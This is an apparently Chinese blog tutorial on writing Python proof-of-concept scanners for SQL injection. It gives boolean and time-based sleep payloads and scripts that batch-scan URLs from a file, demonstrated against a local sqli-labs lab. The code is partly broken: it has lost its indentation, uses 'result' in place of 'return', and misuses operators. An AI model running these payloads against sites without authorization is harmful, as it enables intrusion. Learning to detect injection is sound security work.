python之poc编写——sql篇

文章目录

• sql注入漏洞漏扫


• 
  
  
  
  • 单个网站基础sql扫描
  
  
  • 多个网站sql基础扫描
  
  
  • 
    
    
    
    • 时间盲注型扫描
    
    
    • 升阶版sql批量扫描
    
    
    
    
  
  
  
  

poc:即验证漏洞是否存在的脚本，也就是扫描器


兄弟们，开始写扫描器啦

单个网站基础sql扫描

第一步，当然是写request函数啦。除了时间盲注外，1' and 1=2%23就能判断字符型的sql注入

#!/usr/bin/python
# encoding = utf-8
import requests
def poc(url):
result_rep = requests.get(url)
return len(result_rep.text)
if __name__=="__main__":
header = {"User_Agent":"Firefox/50.0"}#http头，随便写一个装装样子
url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1"

result_lens = []#创建空列表用于比对后面and判断的返回包长度
rep = requests.get(url,headers=header)
normal_len = len(rep.text)#正常请求，也就是if判断正确时应该返回的数据包长度
payloads = ["\'%20and%201=1%23","\'%20and%201=2%23"]#通过单引号and 1=2来验证，用Url编码了空格
for payload in payloads:
result_len = poc(url+payload)#发包
result_lens.append(result_len)

if(result_lens[0] == normal_len & normal_len != result_lens[1]):#表示and 1=1是正确返回包的长度，而and 1=2是错误的返回包长度，也就是说单引号后的内容被mysql正确的执行
print "exists SQL Injection!"



ok，一个很辣鸡的poc产生了，我相信知道sql注入原理的伙伴看到这些个注释没可能读不懂这个脚本

那批量扫描呢？

多个网站sql基础扫描

当然是读文件啦
对上述代码进行改良：

#!/usr/bin/python
# encoding = utf-8
import requests
def poc(url):
result_rep = requests.get(url)
return len(result_rep.text)
def run(url):#把main里进行sql检验的代码进行重复调用，把这段代码写进run函数
result_lens = []
rep = requests.get(url,headers=header)
normal_len = len(rep.text)
payloads = ["\'%20and%201=1%23","\'%20and%201=2%23"]
for payload in payloads:
result_len = poc(url+payload)
result_lens.append(result_len)

if(result_lens[0] == normal_len & normal_len != result_lens[1]):
print "exists SQL Injection!"
if __name__=="__main__":
header = {"User_Agent":"Firefox/50.0"}
urls = open("url.txt",'r').readlines()#将每一行的信息保存到列表里
for url in urls:
run(url)#对url.txt内的网址批量用数据包长度比对方式进行扫描


现在将待扫网址写入url.txt中即可批量扫描，但是如果是时间盲注，那用数据返回包的长度就不能判断有无sql注入漏洞了

时间盲注型扫描

这种扫描就适用于没有过滤且为字符型的所有注入，要用到上一博客讲到的Exception进行异常判断,加在poc校验内。那都用sleep来判断了，result_len就没用了，直接删掉

#!/usr/bin/python
# encoding = utf-8
import requests
def poc(url):
try:
result_rep = requests.get(url,timeout=3)
result "no sql injection"
except Exception as e:
return "timeout"#如果sleep了，就存在sql注入漏洞
def run(url):
rep = requests.get(url,headers=header)
payloads = ["\'%20and%20sleep(5)%23"]
for payload in payloads:
result_info = poc(url+payload)
if("timeout" in result_info):
print "exist sql injection!"
if __name__=="__main__":
header = {"User_Agent":"Firefox/50.0"}
urls = open("url.txt",'r').readlines()#将每一行的信息保存到列表里
for url in urls:
run(url)#对url.txt内的网址批量用数据包长度比对方式进行扫描



升阶版sql批量扫描

上述脚本存在误报，就是payload只有一个单引号闭合，没办法检验数字型sql，双引号型，’)型，’))等
在payload中多加几个类型

payloads = ["\'%20and%20sleep(5)%23","\"%20and%20sleep(5)%23","%20and%20sleep(5)%23","\')%20and%20sleep(5)%23","\'))%20and%20sleep(5)%23"]


http头注入和waf注入poc下一节来讲